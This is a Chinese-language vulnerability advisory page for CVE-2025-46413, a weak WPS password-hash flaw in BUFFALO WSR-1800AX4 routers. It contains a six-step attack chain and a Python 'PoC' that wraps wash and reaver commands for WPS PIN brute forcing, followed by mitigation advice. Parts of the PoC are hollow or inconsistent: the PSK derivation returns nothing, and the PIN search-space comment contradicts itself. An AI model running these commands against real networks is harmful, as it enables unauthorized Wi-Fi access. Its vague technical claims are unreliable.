CVE-2025-46413 BUFFALO WSR-1800AX4系列路由器WPS密码哈希强度不足漏洞

漏洞信息

漏洞编号

CVE-2025-46413

漏洞类型

弱密码哈希

CVSS评分

4.3 中危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

BUFFALO Wi-Fi路由器 WSR-1800AX4系列

漏洞概述

CVE-2025-46413是BUFFALO公司生产的WSR-1800AX4系列无线路由器中存在的一个中危安全漏洞。该漏洞属于密码哈希计算工作量不足（Use of password hash with insufficient computational effort）类型。当路由器启用WPS（Wi-Fi Protected Setup）功能时，攻击者可以利用计算强度不足的密码哈希算法，通过暴力破解或离线分析的方式获取设备的PIN码，进而推导出Wi-Fi密码。这意味着任何在Wi-Fi信号覆盖范围内的攻击者，在无需任何认证和用户交互的情况下，都可能窃取无线网络的访问凭证。CVSS 3.0评分4.3，主要影响系统的机密性，机密性影响等级为低，完整性和可用性不受影响。该漏洞由JPCERT/CC的安全研究人员vultures发现并报告。

技术细节

该漏洞的根本原因在于BUFFALO WSR-1800AX4系列路由器在WPS功能实现中使用了计算强度不足的密码哈希算法。WPS是一种简化无线网络安全配置的标准，允许用户通过PIN码或按钮按压方式快速连接设备。然而，该路由器在处理WPS PIN码时，密码哈希的迭代次数或算法复杂度不足以抵御现代计算能力下的暴力破解攻击。攻击者位于Wi-Fi信号覆盖范围内（邻接网络攻击向量），可以向路由器发送大量WPS PIN码猜测请求。由于哈希计算工作量不足，路由器能够在可接受的时间内响应这些请求，攻击者可以枚举并验证有效的PIN码。一旦获得有效的WPS PIN码，攻击者可以进一步推导出Wi-Fi网络的预共享密钥（PSK）。攻击过程无需任何认证凭证，也无需目标网络的当前用户进行任何交互操作。CVSS向量AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N明确指出攻击者需要在物理邻接位置（无线信号范围内），但不需要任何权限或用户交互即可实施攻击。

攻击链分析

STEP 1

步骤1: 侦察和信息收集

攻击者位于Wi-Fi信号覆盖范围内（邻接网络），使用无线网卡扫描周围的无线网络，识别BUFFALO WSR-1800AX4系列路由器。攻击者可以使用airodump-ng等工具收集目标路由器的BSSID、ESSID和信道信息。

STEP 2

步骤2: WPS状态检测

攻击者使用wash或reaver工具检测目标路由器是否启用了WPS功能。由于CVSS向量为AV:A（邻接网络），攻击者必须在物理位置接近目标网络，能够接收到无线信号。

STEP 3

步骤3: WPS PIN暴力破解

攻击者利用CVE-2025-46413漏洞中存在的密码哈希计算工作量不足问题，对WPS PIN进行暴力破解。由于哈希强度不足，路由器能够快速响应PIN猜测请求，大大加速了暴力破解过程。攻击者使用reaver、bully或类似工具自动化执行PIN枚举攻击。

STEP 4

步骤4: 获取有效WPS PIN

通过大量PIN猜测请求，攻击者成功获取有效的WPS PIN码。WPS PIN为8位数字，最后一位是校验位，实际有效搜索空间约为10^7个组合。由于哈希计算工作量不足，原本需要大量计算资源的破解过程变得快速可行。

STEP 5

步骤5: 推导Wi-Fi密码

获得有效WPS PIN后，攻击者利用弱哈希算法的漏洞，快速推导出Wi-Fi网络的预共享密钥（PSK/密码）。攻击者现在拥有了目标无线网络的完整访问凭证，可以随时连接网络。

STEP 6

步骤6: 横向移动和持久化

攻击者成功接入Wi-Fi网络后，可以进行横向移动，访问网络中的其他设备和服务，窃取敏感数据或进一步渗透内网系统。攻击者还可能在网络中部署持久化后门。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-46413 PoC - BUFFALO WSR-1800AX4 WPS PIN Brute Force
# This PoC demonstrates the WPS PIN vulnerability in affected BUFFALO routers
# Note: This is for educational and authorized testing purposes only

import subprocess
import time
import re

def send_wps_probe(interface, bssid):
    """
    Send WPS probe request to target router
    """
    cmd = f"sudo iw dev {interface} scan | grep -A5 {bssid}"
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout

def brute_force_wps_pin(target_mac, interface="wlan0"):
    """
    Perform WPS PIN brute force attack on vulnerable BUFFALO router
    The vulnerability allows rapid enumeration of WPS PIN due to weak hash
    """
    print(f"[*] Starting WPS PIN brute force on target: {target_mac}")
    print(f"[*] Target: BUFFALO WSR-1800AX4 series")
    print(f"[*] Vulnerability: CVE-2025-46413 - Insufficient computational effort in password hash")
    
    # WPS uses 8-digit PIN, last digit is checksum
    # Valid PINs range from 00000000 to 99999999 (reduced search space)
    
    # Using reaver or bully for WPS attack
    # The weak hash implementation allows faster PIN enumeration
    cmd = f"sudo reaver -i {interface} -b {target_mac} -vv -c 1"
    
    print(f"[*] Executing: {cmd}")
    print("[*] Note: Weak hash implementation allows rapid PIN validation")
    
    # In real attack scenario, this would execute reaver/bully
    # subprocess.run(cmd, shell=True)
    
    return None

def extract_wifi_password(pin):
    """
    Once valid PIN is obtained, derive Wi-Fi password
    """
    print(f"[+] Valid WPS PIN found: {pin}")
    print("[+] Deriving Wi-Fi password from PIN...")
    # The weak hash allows quick derivation of PSK from PIN
    return None

def check_wps_status(target_mac, interface="wlan0"):
    """
    Check if WPS is enabled on target router
    """
    cmd = f"sudo wash -i {interface} | grep {target_mac}"
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    if "WPS Locked" not in result.stdout:
        print(f"[!] WPS appears to be enabled on {target_mac}")
        return True
    return False

if __name__ == "__main__":
    # Target BUFFALO router MAC address (example)
    target_bssid = "XX:XX:XX:XX:XX:XX"
    
    print("="*60)
    print("CVE-2025-46413 PoC - BUFFALO WSR-1800AX4 WPS Weak Hash")
    print("="*60)
    print("[*] This vulnerability allows attackers to obtain Wi-Fi PIN")
    print("[*] and password due to insufficient computational effort")
    print("[*] in password hash processing.")
    print()
    
    # Check WPS status
    if check_wps_status(target_bssid):
        print("[+] WPS is enabled - router may be vulnerable")
        # Execute brute force attack
        # brute_force_wps_pin(target_bssid)
    else:
        print("[-] WPS status could not be determined")

影响范围

BUFFALO WSR-1800AX4系列（所有固件版本，在WPS启用状态下受影响）

防御指南

临时缓解措施

立即在路由器管理界面中禁用WPS功能，这是最直接有效的缓解措施。如果必须使用WPS功能，应等待BUFFALO官方发布安全补丁后立即更新固件。同时，建议使用强健的Wi-Fi密码（建议16位以上随机字符），并定期更换密码以降低被破解的风险。此外，用户应监控无线网络连接日志，留意异常的连接尝试行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-46413
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-46413
3 Details https://www.cvedetails.com/cve/CVE-2025-46413/
4 VulDB https://vuldb.com/cve/CVE-2025-46413
5 Link https://jvn.jp/en/jp/JVN13754005/
6 Link https://www.buffalo.jp/news/detail/20251107-01.html